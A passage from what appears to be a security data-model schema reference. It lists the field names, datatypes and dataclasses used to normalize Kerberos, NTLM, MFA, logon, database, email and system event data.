Dataclass Scalar
xdm.auth.kerberos_tgt
xdm.auth.kerberos_tgt.msg_type
Datatype XDM_CONST.KERBEROS_MSG_TYPE
Dataclass Scalar
xdm.auth.kerberos_tgt.spn_type
Datatype XDM_CONST.KERBEROS_PRINCIPAL_TYPE
Dataclass Scalar
xdm.auth.kerberos_tgt.spn_values
Description The service names being requested.
Datatype String
Dataclass Array
xdm.auth.kerberos_tgt.cname_type
Datatype XDM_CONST.KERBEROS_PRINCIPAL_TYPE
Dataclass Scalar
xdm.auth.kerberos_tgt.cname_values
Datatype String
Dataclass Array
xdm.auth.kerberos_tgt.kdc_options
Datatype XDM_CONST.KERBEROS_KDC_OPTION
Dataclass Scalar
xdm.auth.kerberos_tgt.ticket_expiration
Datatype Number
Dataclass Scalar
xdm.auth.kerberos_tgt.renew_ticket_expiration
Description The time remaining until the ticket renewal expires in seconds.
Datatype Number
Dataclass Scalar
xdm.auth.kerberos_tgt.encryption_type
Datatype XDM_CONST.KERBEROS_ENCRYPTION_TYPE
Dataclass Scalar
xdm.auth.kerberos_tgt.padata_type
Datatype XDM_CONST.KERBEROS_PA_TYPE
Dataclass Scalar
xdm.auth.kerberos_tgt.padata_prefix
Datatype String
Dataclass Scalar
xdm.auth.kerberos_tgt.ticket_prefix
Datatype String
Dataclass Scalar
xdm.auth.kerberos_tgt.error_code
Datatype XDM_CONST.KERBEROS_ERROR_CODE
Dataclass Scalar
xdm.auth.kerberos_tgs
xdm.auth.kerberos_tgs.msg_type
Datatype XDM_CONST.KERBEROS_MSG_TYPE
Dataclass Scalar
xdm.auth.kerberos_tgs.spn_type
Datatype XDM_CONST.KERBEROS_PRINCIPAL_TYPE
Dataclass Scalar
xdm.auth.kerberos_tgs.spn_values
Datatype String
Dataclass Array
xdm.auth.kerberos_tgs.cname_type
Datatype XDM_CONST.KERBEROS_PRINCIPAL_TYPE
Dataclass Scalar
xdm.auth.kerberos_tgs.cname_values
Datatype String
Dataclass Array
xdm.auth.kerberos_tgs.kdc_options
Datatype XDM_CONST.KERBEROS_KDC_OPTION
Dataclass Scalar
xdm.auth.kerberos_tgs.ticket_expiration
Datatype Number
Dataclass Scalar
xdm.auth.kerberos_tgs.renew_ticket_expiration
Description The time remaining until the ticket renewal expires in seconds.
Datatype Number
Dataclass Scalar
xdm.auth.kerberos_tgs.encryption_type
Description The encryption type.
Datatype XDM_CONST.KERBEROS_ENCRYPTION_TYPE
Dataclass Scalar
xdm.auth.kerberos_tgs.padata_type
Datatype XDM_CONST.KERBEROS_PA_TYPE
Dataclass Scalar
xdm.auth.kerberos_tgs.padata_prefix
Datatype String
Dataclass Scalar
xdm.auth.kerberos_tgs.ticket_prefix
Datatype String
Dataclass Scalar
xdm.auth.kerberos_tgs.error_code
Datatype XDM_CONST.KERBEROS_ERROR_CODE
Dataclass Scalar
xdm.auth.ntlm
xdm.auth.ntlm.version
Datatype String
Dataclass Scalar
xdm.auth.ntlm.user_name
Datatype String
Dataclass Scalar
xdm.auth.ntlm.hostname
Datatype String
Dataclass Scalar
xdm.auth.ntlm.target
Datatype String
Dataclass Scalar
xdm.auth.ntlm.domain
Datatype String
Dataclass Scalar
xdm.auth.ntlm.dns_domain
Datatype String
Dataclass Scalar
xdm.auth.ntlm.dns_hostname
Datatype String
Dataclass Scalar
xdm.auth.ntlm.dns_three
Datatype String
Dataclass Scalar
xdm.auth.ntlm.challenge
Datatype String
Dataclass Scalar
xdm.auth.ntlm.ntproof
Datatype String
Dataclass Scalar
xdm.auth.is_mfa_needed
Datatype Boolean
Dataclass Scalar
xdm.auth.mfa
xdm.auth.mfa.method
Datatype String
Dataclass Scalar
xdm.auth.mfa.provider
Datatype String
Dataclass Scalar
xdm.auth.mfa.client_details
Description Additional information about the client, as reported by the multi-factor authentication provider.
Datatype String
Dataclass Scalar
5.10 | xdm.logon
Fields related to a logon attempt.
xdm.logon.type
Description A numeric value that indicates the type of logon session. See https://docs.microsoft.com/en-us/windows/win32/cimwin32prov/win32-logonsession.
Datatype XDM_CONST.LOGON_TYPE
Dataclass Scalar
xdm.logon.assigned_rights
Datatype XDM_CONST.LOGON_ASSIGNED_RIGHT
Dataclass Array
xdm.logon.logon_guid
Datatype String
Dataclass Scalar
xdm.logon.is_elevated
Datatype Boolean
Dataclass Scalar
xdm.logon.is_virtual_account
Datatype Boolean
Dataclass Scalar
xdm.logon.is_restricted_admin_mode
Description Only populated for RemoteInteractive logon type sessions. Indicates whether the credentials provided were passed using Restricted Admin mode.
Datatype Boolean
Dataclass Scalar
xdm.logon.impersonation_level
Description Impersonation is the ability of a thread to execute in a security context that is different from the context of the process that owns the thread. When running in the client's security context, the server 'is' the client, to some degree. See https://docs.microsoft.com/en-us/windows/win32/com/impersonation-levels
Datatype XDM_CONST.LOGON_IMPERSONATION_LEVEL
Dataclass Scalar
xdm.logon.package_name
Datatype String
Dataclass Scalar
xdm.logon.fingerprint
Datatype String
Dataclass Scalar
5.11 | xdm.database
A database action such as query/update/alter.
xdm.database.connection_id
Datatype String
Dataclass Scalar
xdm.database.connection_flags
Description The flags regarding the client connection to the database server.
Datatype String
Dataclass Scalar
xdm.database.operation
Datatype XDM_CONST.DB_OPERATION
Dataclass Scalar
xdm.database.name
Datatype String
Dataclass Scalar
xdm.database.schema
Datatype String
Dataclass Scalar
xdm.database.tables
Datatype String
Dataclass Array
xdm.database.statement
Datatype String
Dataclass Scalar
xdm.database.affected_rows
Datatype Number
Dataclass Scalar
xdm.database.response_time
Datatype Number
Dataclass Scalar
5.12 | xdm.email
Email fields.
xdm.email.recipients
Datatype EmailAddress
Dataclass Array
xdm.email.attachment
xdm.email.attachment.filename
Datatype String
Dataclass Scalar
xdm.email.attachment.path
Datatype String
Dataclass Scalar
xdm.email.attachment.directory
Datatype String
Dataclass Scalar
xdm.email.attachment.extension
Datatype String
Dataclass Scalar
xdm.email.attachment.file_type
Datatype String
Dataclass Scalar
xdm.email.attachment.md5
Description The MD5 hash signature for the email attachment content.
Datatype MD5
Dataclass Scalar
xdm.email.attachment.sha256
Description The SHA256 hash signature for the email attachment content.
Datatype SHA256
Dataclass Scalar
xdm.email.attachment.is_signed
Datatype Boolean
Dataclass Scalar
Examples True
xdm.email.attachment.signer
Datatype String
Dataclass Scalar
xdm.email.attachment.signature_status
Datatype XDM_CONST.SIGNATURE_STATUS
Dataclass Scalar
xdm.email.attachment.size
Datatype Number
Dataclass Scalar
xdm.email.subject
Description The subject line of the email.
Datatype String
Dataclass Scalar
xdm.email.cc
Datatype EmailAddress
Dataclass Array
xdm.email.bcc
Datatype EmailAddress
Dataclass Array
xdm.email.sender
Datatype EmailAddress
Dataclass Scalar
xdm.email.data
Datatype String
Dataclass Scalar
xdm.email.mime
Datatype String
Dataclass Scalar
xdm.email.return_path
Description The header that indicates where and how bounced emails will be processed.
Datatype String
Dataclass Scalar
xdm.email.message_id
Datatype String
Dataclass Scalar
xdm.email.delivery_timestamp
Datatype Timestamp
Dataclass Scalar
xdm.email.origination_timestamp
Datatype Timestamp
Dataclass Scalar
6.1 | _insert_time
The timestamp when the event was ingested into the system. [System Field]
Datatype Timestamp
Dataclass Scalar
6.2 | _time
The event timestamp [System Field]
Datatype Timestamp
Dataclass Scalar
6.3 | _vendor
The vendor of the observing device/agent. May be defined only in Parsing Rules [System Field]
Datatype String
Dataclass Scalar
6.4 | _product
The product name of the observing device/agent. May be defined only in Parsing Rules [System Field]
Datatype String
Dataclass Scalar
6.5 | _reception_time
The Unix timestamp when the event was received by the system. [System Field]
Datatype Number
Dataclass Scalar